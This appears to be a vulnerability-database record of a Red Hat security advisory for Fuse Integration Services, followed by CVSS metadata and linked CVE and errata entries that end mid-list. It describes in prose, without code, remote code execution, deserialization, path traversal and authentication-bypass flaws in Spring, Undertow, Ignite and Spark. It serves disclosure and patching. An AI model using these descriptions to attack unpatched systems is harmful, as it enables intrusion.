(RHSA-2018:2405) Critical: Red Hat FIS 2.0 on Fuse 6.3.0 R7 security and bug fix update

2018-08-14T19:41:42

Description

Red Hat Fuse Integration Services provides a set of tools and containerized xPaaS images that enable development, deployment, and management of integration microservices within OpenShift. Security fix(es): * undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196) * spring-boot: Malicious PATCH requests submitted to servers can use specially crafted JSON data to run arbitrary Java code (CVE-2017-8046) * spring-framework: Improper URL path validation allows for bypassing of security checks on static resources (CVE-2018-1199) * ignite: Possible Execution of Arbitrary Code Within Deserialization Endpoints (CVE-2018-1295) * spark: Absolute and relative pathnames allow for unintended static file disclosure (CVE-2018-9159) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. The CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).

{"id": "RHSA-2018:2405", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2018:2405) Critical: Red Hat FIS 2.0 on Fuse 6.3.0 R7 security and bug fix update", "description": "Red Hat Fuse Integration Services provides a set of tools and containerized xPaaS images that enable development, deployment, and management of integration microservices within OpenShift.\n\nSecurity fix(es):\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* spring-boot: Malicious PATCH requests submitted to servers can use specially crafted JSON data to run arbitrary Java code (CVE-2017-8046)\n\n* spring-framework: Improper URL path validation allows for bypassing of security checks on static resources (CVE-2018-1199)\n\n* ignite: Possible Execution of Arbitrary Code Within Deserialization Endpoints (CVE-2018-1295)\n\n* spark: Absolute and relative pathnames allow for unintended static file disclosure (CVE-2018-9159)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nThe CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).", "published": "2018-08-14T19:41:42", "modified": "2018-08-14T19:42:26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2018:2405", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2017-12196", "CVE-2017-8046", "CVE-2018-1199", "CVE-2018-1295", "CVE-2018-9159"], "immutableFields": [], "lastseen": "2021-10-19T20:38:10", "viewCount": 37, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-0924"]}, {"type": "cve", "idList": ["CVE-2017-12196", "CVE-2017-8046", "CVE-2018-1199", "CVE-2018-1295", "CVE-2018-9159"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-12196", "DEBIANCVE:CVE-2018-1199"]}, {"type": "exploitdb", "idList": ["EDB-ID:44289"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6A15F7602A67FE4C967F250A6203D868"]}, {"type": "f5", "idList": ["F5:K12487579"]}, {"type": "github", "idList": ["GHSA-76QR-MMH8-CP8F", "GHSA-CHP4-RV79-68J3", "GHSA-CP7V-VMV7-6X2Q", "GHSA-V596-FWHQ-8X48"]}, {"type": "ibm", "idList": ["366CE799D9AEE4234CE4D38A22D774A769300127F0319D9238DAEC27C48436E1"]}, {"type": "jvn", "idList": ["JVN:15643848"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2018-0479.NASL", "REDHAT-RHSA-2018-0480.NASL", "REDHAT-RHSA-2018-0481.NASL", "REDHAT-RHSA-2018-1525.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020"]}, {"type": "osv", "idList": ["OSV:GHSA-76QR-MMH8-CP8F", "OSV:GHSA-CHP4-RV79-68J3", "OSV:GHSA-CP7V-VMV7-6X2Q", "OSV:GHSA-V596-FWHQ-8X48"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146817"]}, {"type": "redhat", "idList": ["RHSA-2018:0478", "RHSA-2018:0479", "RHSA-2018:0480", "RHSA-2018:0481", "RHSA-2018:1525", "RHSA-2018:2020", "RHSA-2018:3768", "RHSA-2020:2561", "RHSA-2020:2562"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-12196", "RH:CVE-2017-8046", "RH:CVE-2018-1199", "RH:CVE-2018-1295", "RH:CVE-2018-9159"]}, {"type": "seebug", "idList": ["SSV:97160"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12196", "UB:CVE-2018-1199"]}, {"type": "zdt", "idList": ["1337DAY-ID-29996"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-0924"]}, {"type": "cve", "idList": ["CVE-2017-8046", "CVE-2018-1295", "CVE-2018-9159"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-1199"]}, {"type": "exploitdb", "idList": ["EDB-ID:44289"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6A15F7602A67FE4C967F250A6203D868"]}, {"type": "f5", "idList": ["F5:K12487579"]}, {"type": "github", "idList": ["GHSA-76QR-MMH8-CP8F", "GHSA-CHP4-RV79-68J3", "GHSA-V596-FWHQ-8X48"]}, {"type": "jvn", "idList": ["JVN:15643848"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2018-1525.NASL", "REDHAT_UPDATE_LEVEL.NASL"]}, {"type": "osv", "idList": ["OSV:GHSA-CHP4-RV79-68J3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146817"]}, {"type": "redhat", "idList": ["RHSA-2020:2561"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-12196", "RH:CVE-2017-8046", "RH:CVE-2018-1199", "RH:CVE-2018-1295", "RH:CVE-2018-9159"]}, {"type": "seebug", "idList": ["SSV:97160"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12196", "UB:CVE-2018-1199"]}, {"type": "zdt", "idList": ["1337DAY-ID-29996"]}]}, "exploitation": null, "vulnersScore": 0.7}, "affectedPackage": [], "vendorCvss": {"severity": "critical"}, "_state": {"dependencies": 1660004461, "score": 1659980768}, "_internal": {"score_hash": "0df798f3158ad8f114ff0ef6724ff8a7"}}

{"github": [{"lastseen": "2021-12-22T11:54:46", "description": "In Spark before 2.7.2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. NOTE: this product is unrelated to Ignite Realtime Spark.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-10-19T16:56:00", "type": "github", "title": "Moderate severity vulnerability that affects com.sparkjava:spark-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9159"], "modified": "2021-09-02T19:24:33", "id": "GHSA-76QR-MMH8-CP8F", "href": "https://github.com/advisories/GHSA-76qr-mmh8-cp8f", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-01T22:57:34", "description": "Undertow before versions 1.4.18.SP1 (not findable in Maven), 2.0.2.Final, and 1.4.24.Final was found vulnerable when using Digest authentication, the server does not ensure that the value of URI in the Authorization header matches the URI in HTTP request line. This allows the attacker to cause a MITM attack and access the desired content on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-13T01:38:10", "type": "github", "title": "Incorrect Authorization in Undertow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2022-07-01T21:34:48", "id": "GHSA-CP7V-VMV7-6X2Q", "href": "https://github.com/advisories/GHSA-cp7v-vmv7-6x2q", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-13T12:33:31", "description": "In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket steamer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T20:53:44", "type": "github", "title": "Apache serialization mechanism does not have a list of classes allowed for serialization/deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1295"], "modified": "2022-04-26T19:14:40", "id": "GHSA-CHP4-RV79-68J3", "href": "https://github.com/advisories/GHSA-chp4-rv79-68j3", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T19:58:27", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4, and 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x before 5.0.3) does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification. Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. In this particular attack, different character encodings used in path parameters allows secured Spring MVC static resource URLs to be bypassed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-10-17T20:01:54", "type": "github", "title": "Improper Input Validation in org.springframework.security:spring-security-core, org.springframework.security:spring-security-core , and org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2022-06-24T19:57:37", "id": "GHSA-V596-FWHQ-8X48", "href": "https://github.com/advisories/GHSA-v596-fwhq-8x48", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T18:51:43", "description": "In Spark before 2.7.2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. NOTE: this product is unrelated to Ignite Realtime Spark.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-03-31T21:29:00", "type": "cve", "title": "CVE-2018-9159", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9159"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-9159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9159", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T12:48:22", "description": "undertow before versions 1.4.18.SP1, 2.0.2.Final, 1.4.24.Final was found vulnerable when using Digest authentication, the server does not ensure that the value of URI in the Authorization header matches the URI in HTTP request line. This allows the attacker to cause a MITM attack and access the desired content on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-04-18T01:29:00", "type": "cve", "title": "CVE-2017-12196", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2019-10-09T23:22:00", "cpe": ["cpe:/a:redhat:undertow:1.4.18", "cpe:/a:redhat:jboss_enterprise_application_platform:7.0.0", "cpe:/a:redhat:undertow:2.0.2", "cpe:/a:redhat:virtualization:4.0", "cpe:/a:redhat:undertow:1.4.24", "cpe:/a:redhat:jboss_fuse:6.0.0"], "id": "CVE-2017-12196", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:undertow:1.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:undertow:1.4.24:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:undertow:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-07T17:07:14", "description": "Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-04T06:29:00", "type": "cve", "title": "CVE-2017-8046", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8046"], "modified": "2022-04-07T15:03:00", "cpe": ["cpe:/a:vmware:spring_boot:2.0.0", "cpe:/a:pivotal_software:spring_data_rest:3.0.0"], "id": "CVE-2017-8046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8046", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:m3:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_boot:2.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_boot:2.0.0:milestone5:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_boot:2.0.0:milestone4:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_boot:2.0.0:milestone3:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_boot:2.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:m2:*:*:*:*:*:*", "cpe:2.3:a:pivotal_software:spring_data_rest:3.0.0:m4:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:57", "description": "In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket steamer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-02T17:29:00", "type": "cve", "title": "CVE-2018-1295", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1295"], "modified": "2019-03-05T18:38:00", "cpe": ["cpe:/a:apache:ignite:2.3.0"], "id": "CVE-2018-1295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:ignite:2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-23T18:57:43", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4, and 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x before 5.0.3) does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification. Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. In this particular attack, different character encodings used in path parameters allows secured Spring MVC static resource URLs to be bypassed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-03-16T20:29:00", "type": "cve", "title": "CVE-2018-1199", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2022-06-23T16:42:00", "cpe": ["cpe:/a:redhat:fuse:1.0", "cpe:/a:oracle:rapid_planning:12.1", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:rapid_planning:12.2"], "id": "CVE-2018-1199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1199", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2021-10-19T20:37:17", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform. \n\nRed Hat JBoss A-MQ, based on Apache ActiveMQ, is a standards compliant messaging system that is tailored for use in mission critical applications.\n\nThis patch is an update to Red Hat JBoss Fuse 6.3 and Red Hat JBoss A-MQ 6.3. It includes bug fixes and enhancements, which are documented in the readme.txt file included with the patch files.\n\nSecurity Fix(es):\n\n* spark: Absolute and relative pathnames allow for unintended static file disclosure (CVE-2018-9159)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-26T16:39:25", "type": "redhat", "title": "(RHSA-2018:2020) Moderate: Red Hat JBoss Fuse/A-MQ 6.3 R8 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9159"], "modified": "2018-06-26T16:39:41", "id": "RHSA-2018:2020", "href": "https://access.redhat.com/errata/RHSA-2018:2020", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:40:17", "description": "Red Hat JBoss Enterprise Application Platform CD12 is a platform for Java applications based on the WildFly application runtime.\n\nThis release of Red Hat JBoss Enterprise Application Platform CD12 includes bug fixes and enhancements. \n\nSecurity Fix(es):\n\n* artemis: artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n* lucene: Solr: Code execution via entity expansion (CVE-2017-12629)\n* infinispan-core: infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n* slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)\n* elytron: client can use bogus uri in digest authentication (CVE-2017-12196)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-15T16:04:23", "type": "redhat", "title": "(RHSA-2020:2561) Critical: EAP Continuous Delivery Technical Preview Release 12 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-12629", "CVE-2017-15089", 